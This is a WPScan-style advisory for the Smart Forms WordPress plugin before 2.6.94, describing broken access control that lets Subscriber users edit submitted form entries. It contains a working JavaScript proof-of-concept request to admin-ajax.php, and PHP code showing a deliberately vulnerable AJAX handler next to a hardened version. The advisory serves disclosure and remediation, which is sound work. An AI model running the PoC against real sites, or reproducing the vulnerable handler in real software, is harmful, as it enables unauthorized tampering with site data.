Source: wpvulndb
Author: Amir Hossein Fallahi
WPVDB-ID: BBC6CEBD-E9BF-4B08-A474-F9312B3C0947
History: Mar 25, 2024 - 12:00 a.m.

Smart Forms < 2.6.94 - Subscriber+ Edit Entries via Broken Access Control

wpscan.com
Tags: smart forms, subscriber, access control, wordpress security

AI Score: 6.4 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin does not perform proper authorization checks on some of its AJAX actions, which could allow authenticated users with a role as low as Subscriber to call them and perform unauthorized actions, such as editing submitted form entries.

PoC

While logged in as a subscriber, paste the following in your browser's console (the original listing used typographic quotes, which break the script; they are replaced with straight quotes here):

```javascript
fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: new URLSearchParams({
    'action': 'rednao_smart_forms_edit_form_values',
    'entryId': '7',
    'entryString': '{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"[email protected]"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}',
    'elementOptions': JSON.stringify([{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}])
  })
})
  .then(response => response.json())
  .then(data => console.log(data))
  .catch(error => console.error('Error:', error));
```
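As an added example (not the plugin's own code), the WordPress AJAX handler pattern behind this class of bug is shown beside a hardened version. The hook name follows from the `action` parameter in the PoC above (WordPress routes `admin-ajax.php?action=X` for logged-in users to the `wp_ajax_X` hook); the handler function names, the table name, the nonce name and the choice of the `manage_options` capability are assumptions for illustration.

```php
<?php
// Illustrative handlers, not the plugin's code. Table name, nonce name and
// function names are assumptions; only the hook name comes from the PoC.

// Vulnerable pattern: every logged-in user reaches a wp_ajax_* hook, and
// nothing here checks who the caller is before an entry is overwritten.
function smart_forms_edit_entry_vulnerable() {
    global $wpdb;
    $entry_id = intval( $_POST['entryId'] );
    $values   = wp_unslash( $_POST['entryString'] );
    $wpdb->update( $wpdb->prefix . 'smart_forms_entries', // table name assumed
        array( 'entry_string' => $values ), array( 'id' => $entry_id ) );
    wp_send_json_success();
}

// Hardened pattern: CSRF nonce, then capability check, then input validation,
// all before any data is touched.
function smart_forms_edit_entry_hardened() {
    global $wpdb;

    // 1. Reject requests without a nonce minted for this action (dies on failure).
    check_ajax_referer( 'rednao_smart_forms_edit_form_values', 'nonce' );

    // 2. Editing submitted entries is an administrative action; a Subscriber
    //    never holds manage_options, so the PoC request stops here with 403.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Validate input shape: entryId must be a positive integer and
    //    entryString must be a JSON object, otherwise answer 400.
    $entry_id = isset( $_POST['entryId'] ) ? absint( $_POST['entryId'] ) : 0;
    $values   = isset( $_POST['entryString'] ) ? wp_unslash( $_POST['entryString'] ) : '';
    if ( 0 === $entry_id || ! is_array( json_decode( $values, true ) ) ) {
        wp_send_json_error( array( 'message' => 'bad request' ), 400 );
    }

    // 4. Parameterised update with explicit formats.
    $wpdb->update( $wpdb->prefix . 'smart_forms_entries', // table name assumed
        array( 'entry_string' => $values ), array( 'id' => $entry_id ),
        array( '%s' ), array( '%d' ) );
    wp_send_json_success();
}

// Register only the hardened handler for logged-in users; there is deliberately
// no wp_ajax_nopriv_* registration, so anonymous callers get a 400 from WordPress.
add_action( 'wp_ajax_rednao_smart_forms_edit_form_values', 'smart_forms_edit_entry_hardened' );
```

The front-end must then send the nonce (for example via `wp_create_nonce()` passed through `wp_localize_script()`), and a site-specific fix may prefer a narrower capability or an ownership check on the entry over `manage_options`.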

CPE
Name: (not given)  Operator: eq  Version: 2.6.94

